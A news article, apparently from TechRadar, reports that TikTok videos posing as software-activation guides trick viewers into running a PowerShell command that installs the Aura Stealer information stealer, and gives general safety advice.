- TikTok videos trick users into executing malicious commands disguised as software triggers
- Aura Stealer malware steals passwords, cookies and crypto wallet data from infected systems
- Avoid suspicious links, use official software and keep security tools fully up to date
The dreaded ClickFix malware attacks are now targeting TikTok users, tricking them into installing information stealers and losing sensitive files, account access, and possibly even money.
Security researchers, including Trend Micro, Xavier Mertens, and others, have reported viewing multiple TikTok videos offering instructions on how to “activate” popular software such as Windows, Microsoft 365, Adobe Premiere, and others. In some cases, the videos instruct viewers how to activate product bundles that don’t even exist, such as on Netflix or Spotify.
“Activation” is the usual ClickFix trick: users are instructed to copy and paste a command into Windows Run that is actually a malicious PowerShell command that deploys and executes Aura Stealer.
How to stay safe
Aura Stealer is an information-stealing malware that captures passwords stored in browsers, authentication cookies, cryptocurrency wallet data, and credentials from other applications. Xavier Mertens also added that the ClickFix code also downloads additional malware, the purpose of which is currently unclear.
As a scam technique, ClickFix has been around for decades. It works by tricking people into thinking they have a problem with their computer and then offering a quick and easy solution.
It started with browser pop-ups, in the early 2000s, when the scam revolved around fake virus notifications. In more recent times, ClickFix evolved and now tricks people with fake “locked” documents, exclusive offers, software activators and the like.
To stay safe, be skeptical of random links or buttons in emails or websites, especially those that ask you for urgent corrections or updates. Always visit official websites and use legitimate software. Also, make sure your browser, operating system, and security software are up-to-date and use a trusted ad blocker (if possible).
Finally, be careful when granting permissions to websites or apps: if something seems suspicious or too convenient, close the page and check it first.
Through beepcomputer
Follow TechRadar on Google News and add us as a preferred source to receive news, reviews and opinions from our experts in your feeds. Be sure to click the Follow button!
And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp also.
